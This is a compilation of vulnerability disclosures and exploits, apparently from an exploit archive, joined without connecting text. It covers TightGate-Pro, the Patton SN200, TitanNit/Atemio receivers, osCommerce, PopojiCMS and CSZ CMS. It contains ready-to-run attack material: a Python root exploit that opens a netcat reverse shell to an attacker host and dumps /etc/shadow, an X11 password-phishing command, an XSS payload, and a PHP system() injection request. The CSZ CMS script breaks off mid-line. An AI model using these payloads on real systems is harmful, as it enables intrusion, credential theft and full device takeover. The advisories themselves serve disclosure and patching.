<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231122-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities<br /> product: m-privacy TightGate-Pro<br /> vulnerable version: Rolling Release, servers with the following package<br /> versions are vulnerable:<br /> tightgatevnc < 4.1.2~1<br /> rsbac-policy-tgpro < 2.0.159<br /> mprivacy-tools < 2.0.406g<br /> fixed version: Servers with the following package versions and higher:<br /> mprivacy-tools_2.0.406g<br /> tightgatevnc_4.1.2~1<br /> rsbac-policy-tgpro_2.0.159<br /> CVE number: CVE-2023-47250, CVE-2023-47251<br /> impact: high<br /> homepage: https://www.m-privacy.de/en/tightgate-pro-safe-surfing/<br /> found: 2023-08-18<br /> by: Daniel Hirschberger (Office Bochum)<br /> Steven Kurka (Office Essen)<br /> Marco Schillinger (Office Nürnberg)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"TightGate-Pro is a ReCoB system. ReCoBS stands for Remote-Controlled Browser<br />System, literally translated 'remote-controlled web browser'. TightGate-Pro<br />physically separates the web browser execution environment from the workstation.<br />The system thus shields the internal network from the Internet and reliably<br />and preventively prevents attacks via the web browser. TightGate-Pro is the<br />strongest dedicated ReCoBS, because only physical outsourcing on a hardened<br />system permanently withstands attacks. Local virtualisations, sandboxing<br />systems or micro-virtualisations do not offer effective protection.<br />TightGate-Pro is used in public authorities, financial institutions, industrial<br />companies and critical infrastructures – in short, everywhere where “safe<br />surfing on the Internet” is indispensable at the workplace and internal<br />infrastructures must be reliably protected. TightGate-Pro is BSI-certified<br />according to EAL3+."<br /><br />Source: https://www.m-privacy.de/en/tightgate-pro-safe-surfing/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Code Execution<br />Execution of single commands and scripts is possible with the privileges of<br />the current user. Code execution is possible with any file type on the<br />server and no specific permissions need to be set for the utilized file.<br /><br />Vendor response (translated):<br />"It is intended behavior to execute arbitrary bash scripts. It is not possible<br />to execute arbitrary programs and libraries. There is no privilege escalation<br />possible with this vulnerability."<br /><br />We can confirm that it was not possible to escalate privileges during our test.<br /><br /><br />2) Access to all Desktops (CVE-2023-47250)<br />Multiple users are connecting to the same TightGate-Pro server, resulting in<br />one instance of the X11 window system. Due to insecure permissions of the<br />X11 sockets it is possible for any user to open arbitrary windows on the<br />desktop of other users for phishing attacks or installing a keylogger<br />directly.<br /><br />Vendor response (translated):<br />"We acknowledge this issue as a important vulnerability. A fix with full<br />RSBAC-Jail-Separation and changed Linux-Filesystem permissions is currently<br />available in the "Prestable" packages:<br />- mprivacy-tools_2.0.406g<br />- tightgatevnc_4.1.2~1<br />- rsbac-policy-tgpro_2.0.159<br />These can be applied by the admin user "update". The updates will be provided<br />automatically as Hotfix around 2023-10-24."<br /><br /><br />3) File Transfer by Abusing the Print function (CVE-2023-47251)<br />TightGate-Pro allows printing PDF documents on the host system. Documents are<br />transferred to the host, printed and deleted afterwards. An attacker is able<br />to control the path of the transferred file and to prevent the automatic<br />deletion of the file.<br /><br />Vendor response (translated):<br />"This is not a severe finding but we already fixed it. The fixes are available<br />in the packages:<br />- mprivacy-tools_2.0.406g<br />- tightgatevnc_4.1.2~1<br /><br />Now the .spool directly is always scanned for malicious data and the VNC- client<br />does not transfer files which contain path symbols (e.g. ../)."<br /><br /><br />4) Outdated Update Server<br />Based on disclosed version numbers the update server is running outdated software<br />with known vulnerabilities. The criticality of this issue depends on the<br />exploitability of these issues.<br /><br />Vendor response (translated):<br />"The old version of thttpd is already known. This is not seen as security-relevant.<br />The access to the updateserver requires a previous registration of a customer-<br />provided SSH key, which is only available to administrators on the TightGate-Pro<br />instance. thttpd is isolated on the updateserver and can only *read* files.<br /><br />Even if an attacker can write malicious updatepackages, these are still secured<br />by a cryptographic signature and would not be installed on TightGate-Pro instances.<br />We will eventually replace thttpd with lighthttpd which is still supported."<br /><br /><br />Proof of concept:<br />-----------------<br />1) Code Execution<br />Code execution is possible using the context menu of any file in the VNC session<br />of TightGate-Pro. Selecting "Öffnen mit" (Open with) in the context menu of any<br />file and selecting the "Benutzerdefinierte Befehlszeile" (custom commandline)<br />section of the menu allows to provide a custom shell command to be executed:<br /><br />[advisory_ce_open_with.png]<br />[advisory_ce_custom_command.png]<br /><br />At this point there are two possible options:<br />In case the selected file is a bash script typing `/bin/bash` as custom command<br />will execute the script. For this PoC the following script has been used:<br /><br />```<br />#!bin/bash<br />echo poc >> /home/user/testuser/Desktop/test/PoC2.txt<br />```<br /><br />In case any other file is selected a complete command can be used as well.<br />A possible example is listed below:<br />`/bin/bash -c "echo poc >> /home/user/testuser/Desktop/test/PoC2.txt"`<br /><br />According to vendor, arbitrary code execution is not possible as programs and<br />libraries won't be executed.<br /><br /><br />2) Access to all Desktops (CVE-2023-47250)<br />A normal user without special permissions has read and write access to all X11<br />sockets stored in the temp folder of the user TightGate-Pro, visible in the<br />following screenshot:<br /><br />[advisory_desktop_access_x11_perms.png]<br /><br />This allows any user for example to open dialogue boxes on the desktop of the<br />currently connected users as shown in the following screenshots. The command<br />used is listed below.<br /><br />`/bin/bash -c 'for i in $(ls /home/tmpdir/tmp510/.X11-unix | cut -b 2-); do<br />DISPLAY=unix:"$i".0 zenity --password --username & done;'`<br /><br />[advisory_desktop_access_gui_triggered.png]<br /><br />As it can be seen in the following screenshot any input to the dialogue boxes<br />can be read by the attacker.<br /><br />[advisory_desktop_access_result.png]<br /><br /><br />3) File Transfer by Abusing the Print function (CVE-2023-47251)<br />File transfers can be triggered for PDF files which are stored in the<br />`/home/user/.spool/<username>` directory. By setting a relative path as file<br />name, the file can be stored in any user directory on the host system.<br />In case the file name contains Unicode characters, deletion of the file is<br />not executed after transfer and closing of the print prompt. To store a file<br />on the user's desktop, the name `..\\..\\..\\..\\..\\Desktop\\Ỻeicar.pdf`<br />can be used. The transfer can then be triggered by sending the<br />signal `SIGUSR2` to the `Xtightgatevnc` process:<br /><br />```<br />cp eicar.pdf '/home/user/.spool/<username>/..\\..\\..\\..\\..\\Desktop\\Ỻeicar.pdf'<br />pkill -u $USER --signal SIGUSR2 Xtightgatevnc<br />```<br /><br />In addition, this file transfer does not check if any malicious files are<br />transferred to the host system. The following screenshot shows the warning of<br />a malware scanner after an eicar testfile was transferred. It is therefore<br />possible to circumvent the malware scanner of TightGate-Pro which only runs<br />if the intended way of transfer, namely the TightGate-Schleuse, is used.<br /><br />[advisory_file_transfer_mal_file.png]<br /><br /><br />4) Outdated Update Server<br />Access to the update server is possible with the ssh key stored at<br />`/etc/cu/id_ed25519` and ssh port forwarding. The ssh key is customized<br />for each customer. Root access is needed to retrieve the key.<br />The command used for the forwarding is listed below:<br /><br />```<br />ssh -N -L 8000:localhost:85 tgpro13@update.m-privacy.de -i id_ed25519 -v<br />```<br /><br />Afterwards access is possible at `http:127.0.0.1:8000`.<br />The server headers return the version of the webserver:<br />`thttpd/2.25b 29dec2003`<br /><br />[advisory_outdated_server.png]<br /><br />This version has in sum four known vulnerabilities (high and medium) listed:<br />* CVE-2006-1078<br />* CVE-2006-1079<br />* CVE-2007-0664<br />* CVE-2009-4491<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />A TightGate-Pro server with the following package versions was used<br />for testing:<br /><br />* tightgatevnc < 4.1.2~1<br />* rsbac-policy-tgpro < 2.0.159<br />* mprivacy-tools < 2.0.406g<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-10-11: Contacting vendor through info@m-privacy.de via GPG<br />2023-10-13: CEO of m-privacy phones us and thanks us for the advisory,<br /> a developer will send us a written statement next week.<br />2023-10-16: Received a written statement of their lead developer;<br /> the vulnerabilities #2 (Access to all Desktops) and<br /> #3 (File Transfer by Abusing the Print function) are<br /> confirmed and a fix is available<br /> #1 is seen as a feature not a bug, #4 is claimed to be<br /> prevented by hardening measures on the server, also<br /> thttpd will be replaced by lighthttpd in the future.<br />2023-10-24: We ask for some clarifications regarding software<br /> versions and advisory publication date.<br />2023-10-29: Vendor provides software version information and asks us<br /> to publish the advisory after 2023-11-06.<br />2023-11-22: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Install the "Prestable" packages or wait until they are available as hotfix:<br />* mprivacy-tools_2.0.406g<br />* tightgatevnc_4.1.2~1<br />* rsbac-policy-tgpro_2.0.159<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger, Steven Kurka, Marco Schillinger / @2023<br /></code></pre>
<pre><code>Advisory ID: SYSS-2023-019<br />Product: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway<br />Manufacturer: Patton LLC<br />Affected Version(s): <= 3.21.2-23021<br />Tested Version(s): 2.21.1-22041, 3.21.2-23021, 3.22.0-23083<br />Vulnerability Type: OS Command Injection (CWE-78)<br />Vulnerability Type: Improper Access Control (CWE-284)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2023-07-05<br />Public Disclosure: 2023-08-28<br />CVE Reference: CVE-2023-41109<br />Author of Advisory: Maurizio Ruchay, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />SmartNode SN200 is a VoIP appliance which is manufactured and<br />distributed by Patton LLC.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The SmartNode 200 Series of VoIP Analog Telephone Adapter and VoIP Phone<br />Adapter Gateways support up to four telephone connections. VoIP Analog Phone<br />Adapter integrates legacy Phones and Fax machines into a UCC Environment.<br />High-quality voice and reliable fax over any IP network. All-IP does not end<br />when analog terminals have to be integrated. Security and quality guaranteed."<br /><br />Due to an error in the authorization mechanism and improper input validation,<br />the device allows unauthenticated adversaries to execute OS commands via<br />the web interface.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />SySS GmbH found an unauthenticated OS command injection vulnerability in<br />SmartNode 200 (SN200) devices.<br /><br />The SN200 devices offer a "Network Diagnostic Commands" feature to<br />administrative users. This feature is designed to execute network diagnostic<br />commands like ping. However, as SySS GmbH discovered, the feature can be<br />used to execute arbitrary system commands.<br />Furthermore, a flaw in the authorization mechanism was found. This issue allows<br />unauthenticated adversaries to execute system commands via the affected feature.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following HTTP request shows how the system command "id" is executed<br />on the device:<br /><br />===<br />POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1<br />Cookie: AuthToken=; AuthGroup=superuser; UserName=admin<br />[... shortened ...]<br />Connection: close<br /><br />{"cmd":"/usr/bin/id","arguments":[]}<br />===<br /><br />The following output from the web interface shows that the command has<br />been executed:<br /><br />===<br />*** Command started ***<br />[... shortened ...]<br />uid=0(root) gid=0(root)<br /><br />PING 127.0.0.1 (127.0.0.1): 56 data bytes<br />64 bytes from 127.0.0.1: seq=0 ttl=64 time=1.025 ms<br />64 bytes from 127.0.0.1: seq=1 ttl=64 time=1.781 ms<br /><br />*** Command completed ***<br />===<br /><br />Especially noteworthy is that an empty cookie "AuthToken" can be used in<br />order to bypass the authorization checks.<br /><br />Since the vulnerability is still active, parts of the PoC have been redacted.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />A patch for this issue is not yet available. Therefore, it is recommended to<br />disable the vulnerable "Network Diagnostic Commands" feature if possible.<br />Furthermore, it is advised to block network access to the HTTP interface<br />either on the device directly or via firewall.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2023-06-28: Vulnerability discovered<br />2023-07-05: Vulnerability reported to manufacturer<br />2023-08-28: Public disclosure of vulnerability<br />2023-10-13: Vulnerability confirmation on the newly released update 3.22.0-23083<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for SmartNode SN200<br /> https://www.patton.com/voip-gateway/sn200/<br />[2] OWASP OS Command Injection Defense Cheat Sheet<br /> https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] SySS Security Advisory SYSS-2023-019<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Maurizio Ruchay of SySS GmbH.<br /><br />E-Mail: maurizio.ruchay@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc<br />Key ID: 0xEDA7235FA5478A8C<br />Key Fingerprint: 9AA6 D02F C74F 3EDE C1CE AE51 EDA7 235F A547 8A8C<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: https://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution<br />#<br />#<br /># Vendor: AAF Digital HD Forum | Atelmo GmbH<br /># Product web page: http://www.aaf-digital.info | https://www.atemio.de<br /># Affected version: Firmware <=2.01<br />#<br /># Summary: The Atemio AM 520 HD Full HD satellite receiver enables the<br /># reception of digital satellite programs in overwhelming image quality<br /># in both SD and HD ranges. In addition to numerous connections, the small<br /># all-rounder offers a variety of plugins that can be easily installed<br /># thanks to the large flash memory. The TitanNit Linux software used combines<br /># the advantages of the existing E2 and Neutrino systems and is therefore<br /># fast, stable and adaptable.<br />#<br /># Desc: The vulnerability in the device enables an unauthorized attacker<br /># to execute system commands with elevated privileges. This exploit is<br /># facilitated through the use of the 'getcommand' query within the application,<br /># allowing the attacker to gain root access.<br />#<br /># ========================================================================<br /># _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999<br /># [*] Starting callback listener child thread<br /># [*] Listening on port 9999<br /># [*] Generating callback payload<br /># [*] Calling<br /># [*] Callback waiting: 3s<br /># [*] ('192.168.1.13', 40943) called back<br /># [*] Rootshell session opened<br /># sh: cannot set terminal process group (1134): Inappropriate ioctl for device<br /># sh: no job control in this shell<br /># sh-5.1# id<br /># <-sh-5.1# id<br /># uid=0(root) gid=0(root)<br /># sh-5.1# cat /etc/shadow | grep root<br /># <-sh-5.1# cat /etc/shadow | grep root<br /># root:$6$TAdBGj2mY***:18729:0:99999:7:::<br /># sh-5.1# exit<br /># [*] OK, bye!<br />#<br /># _# <br /># =======================================================================<br />#<br /># Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)<br /># GNU/Linux 3.14-1.17 (armv7l)<br /># GNU/Linux 3.14.2 (mips)<br /># ATEMIO M46506 revision 990<br /># Atemio 7600 HD STB<br /># CPU STx7105 Mboard<br /># titan web server<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5801<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php<br />#<br />#<br /># 16.11.2023<br />#<br /><br />from time import sleep<br />import threading<br />import requests<br />import socket<br />import sys<br /><br />class RemoteControl:<br /><br /> def __init__(self):<br /> self.timeout = 10<br /> self.target = None<br /> self.callback = None<br /> self.cstop = threading.Event()<br /> self.path = "/query?getcommand=&cmd="<br /> self.lport = None<br /> self.cmd = None<br /><br /> def beacon(self):<br /> self.cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "<br /> self.cmd += self.callback + " "<br /> self.cmd += str(self.lport) + " "<br /> self.cmd += ">/tmp/j"<br /> self.path += self.cmd<br /> r = requests.get(self.target + self.path)<br /><br /> def slusaj(self):<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.bind(("0.0.0.0", self.lport))<br /> s.listen(1)<br /> print("[*] Listening on port " + str(self.lport))<br /> sleep(1)<br /> try:<br /> conn, addr = s.accept()<br /> print("\n[*]", addr, "called back")<br /> print("[*] Rootshell session opened")<br /> self.cstop.set()<br /> except socket.timeout:<br /> print("[-] Call return timeout\n[!] Check your ports")<br /> conn.close()<br /> while True:<br /> try:<br /> odg = conn.recv(999999).decode()<br /> sys.stdout.write(odg)<br /> command = input()<br /> command += "\n"<br /> if "exit" in command:<br /> exit(-17)<br /> conn.send(command.encode())<br /> sleep(0.5)<br /> sys.stdout.write("<-" + odg.split("\n")[-1])<br /> except:<br /> print("[*] OK, bye!")<br /> exit(-1)<br /> s.close()<br /><br /> def tajmer(self):<br /> for z in range(self.timeout, 0, -1):<br /> poraka = f"[*] Callback waiting: {z}s"<br /> print(poraka, end='', flush=True)<br /> sys.stdout.flush()<br /> sleep(1)<br /> if self.cstop.is_set():<br /> break<br /> print(' ' * len(poraka), end='\r')<br /><br /> if not self.cstop.is_set():<br /> print("[-] Call return timeout\n[!] Check your ports")<br /> exit(0)<br /> else:<br /> print(end=' ')<br /><br /> def thricer(self):<br /> print("[*] Starting callback listener child thread")<br /> plet1 = threading.Thread(name="ZSL", target=self.slusaj)<br /> plet1.start()<br /> sleep(1)<br /> print("[*] Generating callback payload")<br /> sleep(1)<br /> print("[*] Calling")<br /> plet2 = threading.Thread(name="ZSL", target=self.tajmer)<br /> plet2.start()<br /> self.beacon()<br /> plet1.join()<br /> plet2.join()<br /><br /> def howto(self):<br /> if len(sys.argv) != 4:<br /> self.usage()<br /> else:<br /> self.target = sys.argv[1]<br /> self.callback = sys.argv[2]<br /> self.lport = int(sys.argv[3])<br /> if not self.target.startswith("http"):<br /> self.target = "http://{}".format(self.target)<br /><br /> def dostabesemolk(self):<br /> naslov = """<br /> o===--------------------------------------===o<br /> | |<br /> | TitanNit Web Control Remote Code Execution |<br /> | ZSL-2023-5801 |<br /> | |<br /> o===--------------------------------------===o<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> L!<br /> /_)<br /> / /L<br />_______________________/ (__)<br />_______________________ (__)<br /> \_(__)<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> ||<br /> """<br /> print(naslov)<br /><br /> def usage(self):<br /> self.dostabesemolk()<br /> print("Usage: ./titan.py <target ip> <listen ip> <listen port>")<br /> print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")<br /> exit(0)<br /><br /> def main(self):<br /> self.howto()<br /> self.thricer()<br /><br />if __name__ == '__main__':<br /> RemoteControl().main()<br /></code></pre>
<pre><code># Exploit Title: osCommerce 4 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 13/11/2023<br /># Vendor: osCommerce ltd.<br /># Vendor Homepage: https://www.oscommerce.com/<br /># Software Link: https://demo.oscommerce.com/<br /># Demo Link: https://demo.oscommerce.com/printshop/<br /># Tested on: Windows 11 Home<br /># Impact: Manipulate the content of the site<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /># CVE: CVE-2023-6296<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />Attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /catalog/compare<br /><br />GET parameter 'compare[]' is vulnerable to XSS<br /><br />https://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution<br /># Date: 27/11/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.popojicms.org/<br /># Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip<br /># Version: Version : 2.0.1<br /># Tested on: https://www.softaculous.com/apps/cms/PopojiCMS<br /><br />##POC:<br /><br />1 ) Login with admin cred and click settings<br />2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?><br />3 ) Open main page , you will be see id command result <br /><br /><br />POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1<br />Host: demos5.softaculous.com<br />Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 58<br />Origin: https://demos5.softaculous.com<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E<br /><br />Result: <br /><br />uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <br /></code></pre>
<pre><code># Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution<br /># Date: 17/11/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download<br /># Version: Version 1.3.0<br /># Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS<br /><br /><br />import os<br />import zipfile<br />from selenium import webdriver<br />from selenium.webdriver.common.by import By<br />from selenium.webdriver.firefox.options import Options as FirefoxOptions<br />from selenium.webdriver.firefox.service import Service as FirefoxService<br />from webdriver_manager.firefox import GeckoDriverManager<br />from selenium.webdriver.support.ui import WebDriverWait<br />from selenium.webdriver.support import expected_conditions as EC<br />from selenium.common.exceptions import NoSuchElementException, TimeoutException<br />import requests<br />from time import sleep<br />import sys<br />import random<br />import time<br />import platform<br />import tarfile<br />from io import BytesIO<br /><br />email = "admin@admin.com" <br />password = "password"<br /><br />class colors:<br /> OKBLUE = '\033[94m'<br /> WARNING = '\033[93m'<br /> FAIL = '\033[91m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /> CBLACK = '\33[30m'<br /> CRED = '\33[31m'<br /> CGREEN = '\33[32m'<br /> CYELLOW = '\33[33m'<br /> CBLUE = '\33[34m'<br /> CVIOLET = '\33[35m'<br /> CBEIGE = '\33[36m'<br /> CWHITE = '\33[37m'<br /><br /><br />color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,<br /> colors.CRED, colors.CBEIGE]<br />random.shuffle(color_random)<br /><br /><br />def entryy():<br /> x = color_random[0] + """<br /><br />╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮<br />┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃<br />┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯<br />┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃<br />┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃<br />╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯<br /><br /> << CSZ CMS Version 1.3.0 RCE >><br /> << CODED BY TMRSWRR >><br /> << GITHUB==>capture0x >><br /><br />\n"""<br /> for c in x:<br /> print(c, end='')<br /> sys.stdout.flush()<br /> sleep(0.0045)<br /> oo = " " * 6 + 29 * "░⣿" + "\n\n"<br /> for c in oo:<br /> print(colors.CGREEN + c, end='')<br /> sys.stdout.flush()<br /> sleep(0.0065)<br /><br /> tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"<br /> for c in tt:<br /> print(colors.CWHITE + c, end='')<br /> sys.stdout.flush()<br /> sleep(0.0065)<br /> xx = " " * 6 + 29 * "░⣿" + "\n\n"<br /> for c in xx:<br /> print(colors.CGREEN + c, end='')<br /> sys.stdout.flush()<br /> sleep(0.0065)<br /><br />def check_geckodriver():<br /> current_directory = os.path.dirname(os.path.abspath(__file__))<br /> geckodriver_path = os.path.join(current_directory, 'geckodriver')<br /><br /> if not os.path.isfile(geckodriver_path):<br /> red = "\033[91m"<br /> reset = "\033[0m"<br /> print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)<br /> user_input = input("Would you like to download it now? (yes/no): ").lower()<br /> if user_input == 'yes':<br /> download_geckodriver(current_directory)<br /> else:<br /> print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)<br /> sys.exit(1)<br /><br />def download_geckodriver(directory):<br /><br /> print("[*] Detecting OS and architecture...")<br /> os_name = platform.system().lower()<br /> arch, _ = platform.architecture()<br /><br /> if os_name == "linux":<br /> os_name = "linux"<br /> arch = "64" if arch == "64bit" else 